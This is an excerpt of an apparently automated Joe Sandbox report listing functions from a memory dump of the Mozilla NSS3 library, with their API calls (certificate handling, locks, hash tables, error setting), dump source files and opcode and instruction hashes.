                                                                                                                                                                                                                                                                                          • API ID: sqlite3_value_text$sqlite3_value_blob$memcmpsqlite3_result_error_nomem
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1920323672-0
                                                                                                                                                                                                                                                                                          • Opcode ID: f3079df6ed3b08a0b1736a13bc69b954aedfb705a2358b7e10433027b7d49f45
                                                                                                                                                                                                                                                                                          • Instruction ID: 7c2a34b8f321d634e4c074236b7f6c889ecf53057aa0f971f4f5d549d1c9d0da
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f3079df6ed3b08a0b1736a13bc69b954aedfb705a2358b7e10433027b7d49f45
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E361F7B1E1A2098FDB00CF64D8147EEB7B3AF49308F184166D515AB751E731DD15CB98
                                                                                                                                                                                                                                                                                          Function 6C758F80 Relevance: 12.2, APIs: 8, Instructions: 158memoryCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • SECOID_FindOID_Util.NSS3(?,?,FFFFE005,?,6C757313), ref: 6C758FBB
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7507B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C6F8298,?,?,?,6C6EFCE5,?), ref: 6C7507BF
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7507B0: PL_HashTableLookup.NSS3(?,?), ref: 6C7507E6
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7507B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C75081B
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7507B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C750825
                                                                                                                                                                                                                                                                                          • SECOID_FindOID_Util.NSS3(?,?,?,FFFFE005,?,6C757313), ref: 6C759012
                                                                                                                                                                                                                                                                                          • SECOID_FindOID_Util.NSS3(?,?,?,?,FFFFE005,?,6C757313), ref: 6C75903C
                                                                                                                                                                                                                                                                                          • SECITEM_CompareItem_Util.NSS3(?,?,?,?,?,?,FFFFE005,?,6C757313), ref: 6C75909E
                                                                                                                                                                                                                                                                                          • PORT_ArenaGrow_Util.NSS3(?,?,?,00000001,?,?,?,?,?,?,FFFFE005,?,6C757313), ref: 6C7590DB
                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,FFFFE005,?,6C757313), ref: 6C7590F1
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7510C0: TlsGetValue.KERNEL32(?,6C6F8802,00000000,00000008,?,6C6EEF74,00000000), ref: 6C7510F3
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7510C0: EnterCriticalSection.KERNEL32(?,?,6C6F8802,00000000,00000008,?,6C6EEF74,00000000), ref: 6C75110C
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7510C0: PL_ArenaAllocate.NSS3(?,?,?,6C6F8802,00000000,00000008,?,6C6EEF74,00000000), ref: 6C751141
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7510C0: PR_Unlock.NSS3(?,?,?,6C6F8802,00000000,00000008,?,6C6EEF74,00000000), ref: 6C751182
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7510C0: TlsGetValue.KERNEL32(?,6C6F8802,00000000,00000008,?,6C6EEF74,00000000), ref: 6C75119C
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000,?,?,?,FFFFE005,?,6C757313), ref: 6C75906B
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C79C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C79C2BF
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000,?,FFFFE005,?,6C757313), ref: 6C759128
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Util$Error$ArenaFindValue$HashLookupTable$Alloc_AllocateCompareConstCriticalEnterGrow_Item_SectionUnlock
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3590961175-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 2fc2936615f096d3f3ee8ad3ca23cfff263c484281e358dca533e153235934d8
                                                                                                                                                                                                                                                                                          • Instruction ID: b9b4a3604ef5f72a7ed95ef634f17f8223ce4cf6b37d717e1741b4a25aadb358
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2fc2936615f096d3f3ee8ad3ca23cfff263c484281e358dca533e153235934d8
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0051E6B0A002128FEB10CF2ADE48B26B3F5AF54358F954439D919D7751EF32E822CB91
                                                                                                                                                                                                                                                                                          Function 6C709C50 Relevance: 12.1, APIs: 8, Instructions: 137COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C708850: calloc.MOZGLUE(00000001,00000028,00000000,?,?,6C710715), ref: 6C708859
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C708850: PR_NewLock.NSS3 ref: 6C708874
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C708850: PL_InitArenaPool.NSS3(-00000008,NSS,00000800,00000008), ref: 6C70888D
                                                                                                                                                                                                                                                                                          • PR_NewLock.NSS3 ref: 6C709CAD
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7B98D0: calloc.MOZGLUE(00000001,00000084,6C6E0936,00000001,?,6C6E102C), ref: 6C7B98E5
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6E07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C67204A), ref: 6C6E07AD
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6E07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C67204A), ref: 6C6E07CD
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6E07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C67204A), ref: 6C6E07D6
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6E07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C67204A), ref: 6C6E07E4
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6E07A0: TlsSetValue.KERNEL32(00000000,?,6C67204A), ref: 6C6E0864
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6E07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C6E0880
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6E07A0: TlsSetValue.KERNEL32(00000000,?,?,6C67204A), ref: 6C6E08CB
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6E07A0: TlsGetValue.KERNEL32(?,?,6C67204A), ref: 6C6E08D7
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6E07A0: TlsGetValue.KERNEL32(?,?,6C67204A), ref: 6C6E08FB
                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C709CE8
                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,6C70ECEC,6C712FCD,00000000,?,6C712FCD,?), ref: 6C709D01
                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,?,6C70ECEC,6C712FCD,00000000,?,6C712FCD,?), ref: 6C709D38
                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,6C70ECEC,6C712FCD,00000000,?,6C712FCD,?), ref: 6C709D4D
                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3 ref: 6C709D70
                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3 ref: 6C709DC3
                                                                                                                                                                                                                                                                                          • PR_NewLock.NSS3 ref: 6C709DDD
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7088D0: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C710725,00000000,00000058), ref: 6C708906
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7088D0: EnterCriticalSection.KERNEL32(?), ref: 6C70891A
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7088D0: PL_ArenaAllocate.NSS3(?,?), ref: 6C70894A
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7088D0: calloc.MOZGLUE(00000001,6C71072D,00000000,00000000,00000000,?,6C710725,00000000,00000058), ref: 6C708959
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7088D0: memset.VCRUNTIME140(?,00000000,?), ref: 6C708993
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7088D0: PR_Unlock.NSS3(?), ref: 6C7089AF
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Value$calloc$CriticalEnterLockSectionUnlock$Arena$AllocateInitPoolmemset
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3394263606-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 710b16c48d2bfdc33885c329128fed92cac986fd034c4b3bfb0a47e3c6f2ef5b
                                                                                                                                                                                                                                                                                          • Instruction ID: 2be3c0f3a4ba5e72fe327c7999ae2da4a90855872ec265b997b04394cd187e28
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 710b16c48d2bfdc33885c329128fed92cac986fd034c4b3bfb0a47e3c6f2ef5b
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 88515EF0B057059FDB00EF69C28965ABBF0BF54349F158529D8989B711EB30E844CBD1
                                                                                                                                                                                                                                                                                          Function 6C809EA0 Relevance: 12.1, APIs: 8, Instructions: 136COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C809EC0
                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C809EF9
                                                                                                                                                                                                                                                                                          • _PR_MD_UNLOCK.NSS3(?), ref: 6C809F73
                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C809FA5
                                                                                                                                                                                                                                                                                          • _PR_MD_NOTIFY_CV.NSS3(-00000074), ref: 6C809FCF
                                                                                                                                                                                                                                                                                          • _PR_MD_UNLOCK.NSS3(?), ref: 6C809FF2
                                                                                                                                                                                                                                                                                          • _PR_MD_UNLOCK.NSS3(?), ref: 6C80A01D
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CriticalEnterSection
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1904992153-0
                                                                                                                                                                                                                                                                                          • Opcode ID: ba792fad580136d450afa6695a6f1735d0b377a5df289af71313038787ef1b6b
                                                                                                                                                                                                                                                                                          • Instruction ID: 97a194bbb5a5e63925f0c506c793b05b266b2b064b3ec3b8936cadc97f923a18
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ba792fad580136d450afa6695a6f1735d0b377a5df289af71313038787ef1b6b
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B551A4B2900600DBCB209F25DD8868AB7F4FF15319F15896AD8696BB12E731FC85CBD1
                                                                                                                                                                                                                                                                                          Function 6C6FDCE0 Relevance: 12.1, APIs: 8, Instructions: 90stringCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PR_Now.NSS3 ref: 6C6FDCFA
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7B9DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C800A27), ref: 6C7B9DC6
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7B9DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C800A27), ref: 6C7B9DD1
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7B9DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C7B9DED
                                                                                                                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C6FDD40
                                                                                                                                                                                                                                                                                          • CERT_FindCertIssuer.NSS3(?,?,?,?), ref: 6C6FDD62
                                                                                                                                                                                                                                                                                          • CERT_DestroyCertificate.NSS3(?), ref: 6C6FDD71
                                                                                                                                                                                                                                                                                          • CERT_DestroyCertificate.NSS3(00000000), ref: 6C6FDD81
                                                                                                                                                                                                                                                                                          • CERT_RemoveCertListNode.NSS3(?), ref: 6C6FDD8F
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7106A0: TlsGetValue.KERNEL32 ref: 6C7106C2
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7106A0: EnterCriticalSection.KERNEL32(?), ref: 6C7106D6
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7106A0: PR_Unlock.NSS3 ref: 6C7106EB
                                                                                                                                                                                                                                                                                          • CERT_DestroyCertificate.NSS3(?), ref: 6C6FDD9E
                                                                                                                                                                                                                                                                                          • CERT_DestroyCertificate.NSS3(?), ref: 6C6FDDB7
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CertificateDestroy$Time$CertSystem$CriticalEnterFileFindIssuerListNodeRemoveSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strcmp
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 653623313-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 5cd1e4dda6c1f4cf8b67a259948b155a30ce1e8299e7f18c14593722b5766ec0
                                                                                                                                                                                                                                                                                          • Instruction ID: 79e66501c2868effb340acb0d9e9f223ce71519535103393355fe183da6fcb3f
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5cd1e4dda6c1f4cf8b67a259948b155a30ce1e8299e7f18c14593722b5766ec0
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D8215EB6E011199BDB019E94DC419DEB7B6AF05318B140424E924A7711E731F916CBFA
                                                                                                                                                                                                                                                                                          Function 6C785F60 Relevance: 12.1, APIs: 8, Instructions: 64COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PR_DestroyMonitor.NSS3(?,00000000,00000000,?,6C78AADB,?,?,?,?,?,?,?,?,00000000,?,6C7880C1), ref: 6C785F72
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6EED70: DeleteCriticalSection.KERNEL32(?), ref: 6C6EED8F
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6EED70: DeleteCriticalSection.KERNEL32(?), ref: 6C6EED9E
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6EED70: DeleteCriticalSection.KERNEL32(?), ref: 6C6EEDA4
                                                                                                                                                                                                                                                                                          • PR_DestroyMonitor.NSS3(?,00000000,00000000,?,6C78AADB,?,?,?,?,?,?,?,?,00000000,?,6C7880C1), ref: 6C785F8F
                                                                                                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(00000001,00000000,00000000,?,6C78AADB,?,?,?,?,?,?,?,?,00000000,?,6C7880C1), ref: 6C785FCC
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?,?,6C78AADB,?,?,?,?,?,?,?,?,00000000,?,6C7880C1), ref: 6C785FD3
                                                                                                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(00000001,00000000,00000000,?,6C78AADB,?,?,?,?,?,?,?,?,00000000,?,6C7880C1), ref: 6C785FF4
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?,?,6C78AADB,?,?,?,?,?,?,?,?,00000000,?,6C7880C1), ref: 6C785FFB
                                                                                                                                                                                                                                                                                          • PR_DestroyMonitor.NSS3(?,00000000,00000000,?,6C78AADB,?,?,?,?,?,?,?,?,00000000,?,6C7880C1), ref: 6C786019
                                                                                                                                                                                                                                                                                          • PR_DestroyMonitor.NSS3(?,00000000,00000000,?,6C78AADB,?,?,?,?,?,?,?,?,00000000,?,6C7880C1), ref: 6C786036
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CriticalDeleteSection$DestroyMonitor$free
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 227462623-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 65d2b46d8452c625230862dfa9bc5fb9b51230bb94ff196d14002b448273d144
                                                                                                                                                                                                                                                                                          • Instruction ID: e4bbabfe556aa3b600165c28e4917c67bda1fc20b65384bce6d765e88d7c08d9
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 65d2b46d8452c625230862dfa9bc5fb9b51230bb94ff196d14002b448273d144
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5B214DF1605B04ABEB219F75E808BD377E8AB4574CF100838E55AC7640D736E018CB95
                                                                                                                                                                                                                                                                                          Function 6C6F3C90 Relevance: 12.1, APIs: 8, Instructions: 60COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,?,?,6C76460B,?,?), ref: 6C6F3CA9
                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C6F3CB9
                                                                                                                                                                                                                                                                                          • PL_HashTableLookup.NSS3(?), ref: 6C6F3CC9
                                                                                                                                                                                                                                                                                          • SECITEM_DupItem_Util.NSS3(00000000), ref: 6C6F3CD6
                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3 ref: 6C6F3CE6
                                                                                                                                                                                                                                                                                          • CERT_FindCertByDERCert.NSS3(?,00000000), ref: 6C6F3CF6
                                                                                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C6F3D03
                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3 ref: 6C6F3D15
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C79DD70: TlsGetValue.KERNEL32 ref: 6C79DD8C
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C79DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C79DDB4
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CertCriticalItem_SectionUnlockUtilValue$EnterFindHashLeaveLookupTableZfree
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1376842649-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 7200c3a8968ce0bc668d81ed2d813820ba556853f3c35faaacc877ab4f79bd4d
                                                                                                                                                                                                                                                                                          • Instruction ID: fde0421a991a720d7b407fe161a9ad7c70be13cc850a1dcad57767af82987bc2
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7200c3a8968ce0bc668d81ed2d813820ba556853f3c35faaacc877ab4f79bd4d
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5D114CB6E01115A7EF112B24EC098EA3A7DEB0325CB544131ED2883712FB22D859C6E6
                                                                                                                                                                                                                                                                                          Function 6C6F9C50 Relevance: 10.8, APIs: 7, Instructions: 253stringCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7111C0: PR_NewLock.NSS3 ref: 6C711216
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C6F9E17
                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6F9E25
                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6F9E4E
                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C6F9EA2
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C709500: memcpy.VCRUNTIME140(00000000,?,00000000,?,?), ref: 6C709546
                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C6F9EB6
                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3 ref: 6C6F9ED9
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE08A,00000000), ref: 6C6F9F18
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: strlen$CriticalEnterErrorLockSectionUnlockValuefreememcpy
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3381623595-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 7f58457b60aa2a2d346ceb600046cd361db1c34590e5f7b29144d4843dfaf23d
                                                                                                                                                                                                                                                                                          • Instruction ID: fedf9410719a04db22b96faa65e53d3ef9a53a962935f4f0814bb45b243b0ceb
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7f58457b60aa2a2d346ceb600046cd361db1c34590e5f7b29144d4843dfaf23d
